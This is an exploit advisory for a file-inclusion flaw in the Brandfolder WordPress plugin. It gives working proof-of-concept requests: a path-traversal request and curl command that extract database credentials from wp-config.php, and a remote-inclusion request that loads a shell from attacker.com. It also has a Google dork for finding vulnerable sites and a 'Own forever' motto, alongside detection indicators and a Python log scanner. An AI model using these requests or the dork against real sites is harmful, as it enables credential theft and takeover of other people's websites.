Brandfolder WordPress Plugin – Remote File Inclusion / Local File Inclusion (LFI / RFI)
Overview
Plugin: Brandfolder
Vulnerability: Remote File Inclusion / Local File Inclusion
Severity: High (CVSS 7.5)
Summary
The Brandfolder WordPress plugin has a flaw in the wp_abspath parameter of the file callback.php.
A user can set the path of the file to be included without any filtering, which leads to:
- Local file inclusion (reading sensitive files such as wp-config.php)
- Remote file inclusion (if allow_url_include is enabled on the server)
Vulnerable Endpoint
/wp-content/plugins/brandfolder/callback.php
Proof of Concept (PoC)
Local File Inclusion (LFI)
GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1 Host: target.com
Sample cURL Command
curl -s "https://target.com/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00" | grep -Ei 'DB_NAME|DB_PASSWORD|DB_USER'
Expected Result
define( 'DB_NAME', 'dbname' );
define( 'DB_USER', 'dbuser' );
define( 'DB_PASSWORD', 'dbpass' );
define( 'DB_HOST', 'localhost' );
Advanced Exploitation (Optional RFI)
If the server allows allow_url_include:
GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=http://attacker.com/shell.txt%00 HTTP/1.1 Host: target.com
Impact
- Disclosure of database credentials.
- Potential full WordPress compromise.
- Possible RCE if allow_url_include is enabled.
Detection
- Access-log entries for callback.php carrying the wp_abspath parameter.
- Path traversal patterns such as ../../../ in the URL.
- Responses containing sensitive data such as DB_PASSWORD.
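As an added example (not part of the original advisory), a small scanner that applies these indicators to web-server access-log lines: every request to callback.php with wp_abspath is reported, and traversal, %00 truncation and remote-URL values are tagged. The log lines, the placeholder IPs and the tag names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2024:12:00:01 +0000] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.7 - - [10/May/2024:12:00:05 +0000] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=http://203.0.113.9/shell.txt%00 HTTP/1.1" 200 77 "-" "curl/8.0"
198.51.100.4 - - [10/May/2024:12:01:00 +0000] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/ HTTP/1.1" 200 20 "-" "Mozilla/5.0"
198.51.100.4 - - [10/May/2024:12:01:10 +0000] "GET /index.php?p=../../../etc/passwd HTTP/1.1" 404 10 "-" "Mozilla/5.0"
"""

ENDPOINT = "/wp-content/plugins/brandfolder/callback.php"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'\.\.[/\\]')                      # ../ or ..\ anywhere in the value
REMOTE_URL = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)  # http://, ftp://, php:// ...

def classify(value):
    """Tag one decoded wp_abspath value with the indicators it carries."""
    tags = []
    if TRAVERSAL.search(value):
        tags.append("traversal")
    if "\x00" in value:            # %00 truncation, as used in the PoC above
        tags.append("null-byte")
    if REMOTE_URL.match(value):    # RFI attempt; only works if allow_url_include is on
        tags.append("remote-url")
    return tags

def scan_log(text):
    """One finding per request to callback.php that carries wp_abspath."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != ENDPOINT:
            continue
        # parse_qs decodes once; unquote again so a double-encoded %252e%252e/ is not missed
        for raw in parse_qs(url.query, keep_blank_values=True).get("wp_abspath", []):
            value = unquote(raw)
            tags = classify(value)
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": int(m.group("status")), "value": value,
                             "tags": tags, "severity": "high" if tags else "review"})
    return findings

for f in scan_log(SAMPLE_LOG):
    print(f["severity"], f["ip"], f["tags"], repr(f["value"]))
```

Untagged hits are still reported as "review" because the advisory treats any wp_abspath request to this endpoint as suspicious.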
Google Dork for Hunting
inurl:"/wp-content/plugins/brandfolder/callback.php"
References
Closing
One parameter injection, one leaked file, one WordPress site down. With the database credentials, an attacker can take over the site completely.
Motto: Access once. Own forever.